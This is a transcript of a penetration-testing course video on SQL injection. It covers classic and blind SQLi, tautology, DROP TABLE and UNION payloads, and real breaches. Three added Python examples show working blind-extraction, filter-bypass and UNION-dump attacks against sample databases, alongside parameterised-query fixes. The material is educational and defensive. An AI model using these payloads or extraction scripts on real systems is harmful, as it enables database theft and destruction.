Welcome to Cybrary. I am Raymond Evans and I will be your subject matter expert for Cybrary's web app penetration testing course.
In this video we will be discussing SQL injection. So what will be covered?
What a SQL injection is, how it works, some types, and some examples. So what is a SQL injection?
Well, a SQL injection is a code injection attack which takes advantage of improperly filtered user input to enumerate and manipulate a database.
What exactly does that mean? Well, an attacker can use a statement to send commands to a SQL database and get information back from it.
An attacker can also use this statement to manipulate data on the database as well, such as doing things like
dumping an entire database. Two types of SQL injection we will be covering are classic SQL injection, or SQLi,
and blind SQL injection, or blind SQLi.
I'm going to be interchanging "SQL injection" and "SQLi" throughout this course, because that's how you will see it in the real world. You'll see
both of those terms used. So what is a classic SQL injection?
Well, a SQL injection occurs when escape characters are improperly filtered.
An escape character is something like a single or a double quote;
these are used to denote the end of something and then the beginning of a series of commands. A SQL injection
command is then sent
to the SQL application.
The results are immediately displayed to the attacker.
Classic SQL injections usually utilize WHERE clause modification and UNION operator injections to exploit the improper filtering.
You will be seeing those modifications later on, and I will be explaining them further. Blind SQL injection is a form of SQL injection
that does the same exact thing as normal SQL injection, except the attacker is not able to immediately see the results.
For a web application that needs to be tested for blind SQL injection, it's best to use an automated tool,
such as the one I'll talk about below, or, if you want, you can also craft a statement with a SQL injection to do something like create a user account or add some kind of data to the database. If this works, then you know that it's vulnerable to a blind SQL injection. So
an attacker can't perform a SQL injection and get data immediately back. However, they can perform a blind SQL injection to do something like dump the database or add a user account for themselves to gain access. Where would you exactly inject, though?
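Before moving on to where the injection goes, here is a worked version of the blind case just described. This is an added example, not code from the video or from Cybrary: a hypothetical "is this username taken?" endpoint (`username_taken`) concatenates user input into SQL but only ever answers yes or no, so nothing is displayed to the attacker. The sample users, the secret password and the printable-ASCII assumption are all constructed for the example; `blind_extract` recovers the secret one true/false question at a time, the way an automated tool does it.

```python
import sqlite3

# Constructed sample data for this example; not from the original video.
USERS = [("alice", "alicepw"), ("admin", "s3cret")]


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database with a users table holding a secret."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)", USERS)
    return conn


def username_taken(conn: sqlite3.Connection, username: str) -> bool:
    """Hypothetical 'is this username taken?' check. It concatenates the
    input into SQL (the injection flaw) but only ever reveals yes or no,
    never the rows, which is exactly what makes the injection blind."""
    query = "SELECT 1 FROM users WHERE username = '" + username + "'"
    return conn.execute(query).fetchone() is not None


def blind_extract(oracle, known_user: str, target_sql: str, max_len: int = 64) -> str:
    """Boolean-based blind extraction. `oracle` answers True/False for a
    payload; `known_user` is a username known to exist so the base WHERE
    is true; `target_sql` is a scalar subquery for the value to steal.
    Each character is recovered by binary search over printable ASCII
    (32..126, an assumption of this example), about 7 requests per character."""
    recovered = ""
    for pos in range(1, max_len + 1):
        # Stop once the target string is shorter than the current position.
        if not oracle(f"{known_user}' AND length({target_sql}) >= {pos} --"):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            # unicode(substr(x, pos, 1)) is the code point of one character,
            # which keeps quoted characters out of the payload entirely.
            if oracle(f"{known_user}' AND unicode(substr({target_sql}, {pos}, 1)) > {mid} --"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    conn = make_db()
    oracle = lambda payload: username_taken(conn, payload)
    # The endpoint never shows data, even with a tautology: just True.
    print(oracle("x' OR 1=1 --"))
    # Yet one bit per request is enough to pull the admin password out.
    print(blind_extract(oracle, "admin", "(SELECT password FROM users WHERE username = 'admin')"))
```

The same oracle can be any observable difference: a "taken"/"available" message, an HTTP status, or a response delay when a time-based payload is used instead. What makes it blind is only that the rows themselves never reach the attacker.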
Well, SQL injections can be placed in various portions of a web page, and in the source code of the page itself as well.
The two most common areas you will find them
are in the URL and in form fields. And here we see
a couple of examples of those attacks in those different fields. In the URL, we see in the first one that it uses a single escape character to try to discover if a SQL injection is possible.
The second one is using the escape character to try to get a SQL error back.
The third one here actually uses a 1=1 statement,
and this would be used to try to dump data.
Same thing within the form field. Here
you are telling it that you're looking for
any username with ID 1, or any username for which the condition is true. So it'll dump out all the usernames to you, because all of the usernames satisfy the condition. So why is this dangerous? Well,
when a website is vulnerable to a SQL injection, the site may disclose a lot of sensitive information: stuff like credit card data, Social Security numbers, addresses, usernames and passwords.
This data can be used to steal identities and money, or it could be used to con victims over a long period of time.
In the case of usernames and passwords, this could be used to
get admin credentials and elevate the attacker's privileges on a system as well. So that's another reason why it's really, really dangerous: privilege escalation. If something like this goes unchecked for years upon years,
an attacker could just sit back and siphon off data, just steal credit cards and Social Security numbers for many, many years,
if it's left unchecked, and if there's nothing set up like an IDS
or an IPS to identify these types of attacks. So here's a couple of examples of SQL injections.
So in our first one here
we see that 1=1 statement again.
So this query is recognized as true, and it'll dump the database onto the screen. This is one of the most common examples that you will see, and it's amazing how much this works. Now, you can
trick a system even if it's filtering the classic 1=1, because as long as any variables are in there whatsoever,
it will do this. So you could do 'Tim'='Tim' or 'Bob'='Bob'. As long as that statement's
first and second portions are equal and correct, it'll dump the database for you.
So that's something to watch out for. You know, if you say, "Oh hey, it's cool, we got the classic 1=1 filtered,"
well, do you have 'banana'='banana' or 'dog'='dog'?
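Here is what the 1=1 trick, the 'banana'='banana' variant and the fix look like against a concrete query. This is an added example, not code from the video or from Cybrary. The form handler (`lookup_user_vulnerable`), the blocklist that only catches 1=1 (`lookup_user_filtered`), the parameterised version (`lookup_user_safe`) and the three sample users are all constructed for the example.

```python
import re
import sqlite3

# Constructed sample data for this example; not from the original video.
USERS = [
    ("alice", "alicepw", "user"),
    ("bob", "bobpw", "user"),
    ("admin", "adminpw", "admin"),
]


def make_db() -> sqlite3.Connection:
    """Build an in-memory SQLite database with a small users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)", USERS
    )
    return conn


def lookup_user_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    """Hypothetical form handler that concatenates the username into SQL.
    A single quote in the input closes the string literal, so whatever
    follows it is parsed as SQL rather than treated as data."""
    query = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(query).fetchall()


def lookup_user_filtered(conn: sqlite3.Connection, username: str) -> list:
    """Same flaw behind a blocklist that only rejects the classic 1=1.
    Any other comparison that is always true still gets through."""
    if re.search(r"1\s*=\s*1", username):
        raise ValueError("blocked by filter")
    return lookup_user_vulnerable(conn, username)


def lookup_user_safe(conn: sqlite3.Connection, username: str) -> list:
    """Parameterised query: the driver passes the value separately from the
    SQL text, so quotes and OR in the input are only ever matched as data."""
    query = "SELECT username, role FROM users WHERE username = ?"
    return conn.execute(query, (username,)).fetchall()


def is_blocked(conn: sqlite3.Connection, username: str) -> bool:
    """True if the naive 1=1 filter rejects the input."""
    try:
        lookup_user_filtered(conn, username)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    conn = make_db()
    # Normal use returns one row.
    print(lookup_user_vulnerable(conn, "alice"))
    # Classic tautology: the -- comments out the template's closing quote.
    print(lookup_user_vulnerable(conn, "' OR 1=1 --"))
    # The filter catches 1=1 ...
    print(is_blocked(conn, "' OR 1=1 --"))
    # ... but not an equivalent tautology, which dumps every user anyway.
    print(lookup_user_filtered(conn, "' OR 'banana'='banana"))
    # The parameterised query treats the whole payload as a username and finds nothing.
    print(lookup_user_safe(conn, "' OR 'banana'='banana"))
```

The lesson of the blocklist is the one in the talk: there are infinitely many true comparisons, so filtering the famous one buys nothing. Only the parameterised query closes the hole, because the input never reaches the SQL parser as code.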
I don't think so. And next we have an example which is asking to display every column from every table where the ID equals 1, which would display the entire database.
This type of statement could be used to refine your search even further. So here we see SELECT * FROM * WHERE id=1.
Now those star spots there
can be used to refine your searches, so that star represents a variable for everything.
So you're saying select everything from everything where ID equals 1. So you could say something like
SELECT username FROM users, if you know the table's called users,
and you would get a list of everybody named Frank from that database. Next we see an example of how to modify something
on the table, and what we're doing is saying select everything from everything where ID equals 1, and then it says DROP TABLE
everything. If your database was vulnerable to SQL injection and somebody was to put this in there,
it could and would drop your tables, which is really bad, because it would be deleting your database. Our final example here, the statement below, uses a SQL post injection to refine its attacks even more. So it's showing, like above, select a variable
from a variable where type ID equals 1,
and then it uses a UNION SELECT / UNION ALL SELECT statement
to define it even further. This type of SQL post injection will most likely be used with a program such as sqlmap, which we will be showing later on, and I will be demonstrating later on
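As an added example of the UNION refinement just described (not code from the video or from Cybrary), here is the sequence a tool like sqlmap automates: first find how many columns the original SELECT returns, then UNION a second SELECT of the same width against a table the page was never meant to show. The product page (`product_page`), the `products` and `users` tables and their rows are constructed for the example; `sqlite_master` is SQLite's real schema table, used here to enumerate table names before dumping one.

```python
import sqlite3

# Constructed sample data for this example; not from the original video.
PRODUCTS = [("widget", 9.99), ("gadget", 19.99)]
USERS = [("alice", "alicepw"), ("admin", "s3cret")]


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database: a public products table and a users table
    the product page was never meant to expose."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany("INSERT INTO products (name, price) VALUES (?, ?)", PRODUCTS)
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)", USERS)
    return conn


def product_page(conn: sqlite3.Connection, product_id: str):
    """Hypothetical product page: ?id= from the URL is concatenated, unquoted,
    into the query. Returns the rows, or None where a real page would show
    a generic database error."""
    query = "SELECT name, price FROM products WHERE id = " + product_id
    try:
        return conn.execute(query).fetchall()
    except sqlite3.Error:
        return None


def find_column_count(fetch, max_cols: int = 10):
    """UNION needs the same number of columns on both sides, so probe with a
    growing list of NULLs until the query stops erroring. This is the first
    thing a tool like sqlmap works out before a UNION-based dump."""
    for n in range(1, max_cols + 1):
        nulls = ", ".join(["NULL"] * n)
        if fetch(f"1 UNION ALL SELECT {nulls}") is not None:
            return n
    return None


def union_dump(fetch, table: str, columns):
    """Pull arbitrary columns of another table through the product page.
    id = 0 matches no product, so only the UNIONed rows come back; extra
    positions are padded with NULL to satisfy the column count."""
    n = find_column_count(fetch)
    if n is None or len(columns) > n:
        return None
    cols = list(columns) + ["NULL"] * (n - len(columns))
    return fetch(f"0 UNION ALL SELECT {', '.join(cols)} FROM {table}")


if __name__ == "__main__":
    conn = make_db()
    fetch = lambda payload: product_page(conn, payload)
    print(fetch("1"))
    print(find_column_count(fetch))
    # Enumerate the schema first (SQLite keeps it in sqlite_master) ...
    print(union_dump(fetch, "sqlite_master", ["name", "sql"]))
    # ... then dump the table you found.
    print(union_dump(fetch, "users", ["username", "password"]))
```

The column-count probe is why UNION payloads look like long strings of NULLs: each NULL is a placeholder whose type the database will accept in any position. Once the width matches, the attacker's rows ride back on the same page that normally shows a product.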
how to create a more refined search with this string here. Right now, it seems like
a lot of garbage to you. But once we actually
practice it and show how it's used, it will make a lot more sense. So what are some real-world examples of
SQL injection being used and impacting people?
Well, in 2008 the Sexual and Violent Offender Registry of Oklahoma had 10,597 Social Security numbers belonging to sex offenders stolen via SQL injection. In 2002, Guess.com was vulnerable to a SQL injection attack permitting anybody
who could construct a properly crafted URL to pull down
200,000-plus names, credit card numbers and expiration dates in the site's customer database.
And then, in 2011, LulzSec
was accused of using SQL injection to steal coupons, download keys and passwords that were stored in plain text on Sony's website. So the Guess.com vulnerability, the SQL injection vulnerability that was there, was one of the 1=1 statements
in the URL itself. So that's one example of where that was used. And as for the 2011 LulzSec attack: you never store anything that sensitive in plain text, ever, anywhere.
So what was covered? Well, I talked about what a SQL injection is, showed a couple of examples, talked about how it works, talked about some types of SQL injection, and then gave you some real-world examples.
Happy hacking, everyone.